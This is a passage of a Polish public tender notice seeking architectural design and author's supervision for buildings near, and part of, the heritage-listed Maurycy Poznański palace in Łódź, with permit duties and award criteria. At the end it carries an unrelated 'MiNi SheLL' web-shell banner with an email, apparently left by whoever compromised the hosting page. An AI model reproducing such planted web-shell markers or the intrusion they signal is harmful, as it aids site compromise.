W treści dokumentacji projektowej oraz w  kosztorysach inwestorskich,  zakazuje się używania nazw własnych produktów i materiałów oraz ich producentów pod rygorem odpowiedzialności za  naruszenie dyscypliny finansów publicznych. Należy określać produkty i materiały w sposób opisowy nie naruszający zasad uczciwej konkurencji, w szczególności przepisów ustawy z dnia 16 kwietnia 1993r. o zwalczaniu nieuczciwej konkurencji,  tekst jednolity Dz. U. z 2003r. Nr 153 poz.1503 ze zm.
5.	Wykonawca uzyska na rzecz zamawiającego   wszystkie niezbędne  do  pozwolenia na budowę i  rozpoczęcia realizacji inwestycji budowlanej dokumenty,  w tym takie jak np. decyzja o warunkach zabudowy, inne uzgodnienia, pozwolenie Wojewódzkiego Konserwatora zabytków na wykonywanie robót budowlanych  zlokalizowanych                  w otoczeniu obiektów zabytkowych wpisanych do rejestru zabytków województwa łódzkiego oraz  pozwolenie na budowę. 
6.	Przedmiot zamówienia  obejmuje także sprawowanie nadzoru autorskiego  w trakcie wykonywania robót budowlanych na podstawie dokumentacji projektowej sporządzonej przez wykonawcę  niniejszego zamówienia. 
Koszt jednej wizyty, maksymalnie 8 godzin, Wykonawca zobowiązany jest podać w formularzu ofertowym. 
Zakładana na potrzeby obliczenia ceny złożonej oferty ilość wizyt na budowie podczas pełnienia nadzoru autorskiego wynosi dla każdego zadania: 20 maksymalnie ośmiogodzinnych pobytów, pozostałe wizyty rozliczne będą dodatkowo zgodnie                  z podaną stawką.
7.	Budynki   oznaczone  jako BC, część 1 zamówienia, znajdują się w otoczeniu  zabytkowych  obiektów wpisanych do rejestru zabytków  województwa łódzkiego. W załączeniu SIWZ- mapka lokalizacyjna, vide budynek B  widoczny z ul. Gdańskiej, budynek C nie widoczny od strony ulicy Gdańskiej. 
8.	Budynki oznaczone jako  DEF, część 2 zamówienia,  są  częścią - oficyna  południowa -  głównego pałacu Maurycego Poznańskiego i wpisane  są  w rejestr zabytków województwa łódzkiego. W załączeniu SIWZ mapka lokalizacyjna, vide budynek narożny ul. Gdańska Więckowskiego.
9.	Założenia do projektowania  zawarte są w treści załącznika do niniejszej SIWZ w odniesieniu do każdej z dwóch części odrębnie.
10.	Istotne warunki  umowy w tym min.  istotne warunki  realizacji przedmiotu zamówienia  zawarte są  w niniejszej SIWZ oraz  w treści wzoru umowy,  stanowiącym załącznik do niniejszej SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. termin wykonania projektu budowlanego z uzgodnieniami - 20</li>
<li>3. jakość funkcjonalność  rozwiązań koncepcji architektonicznej - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com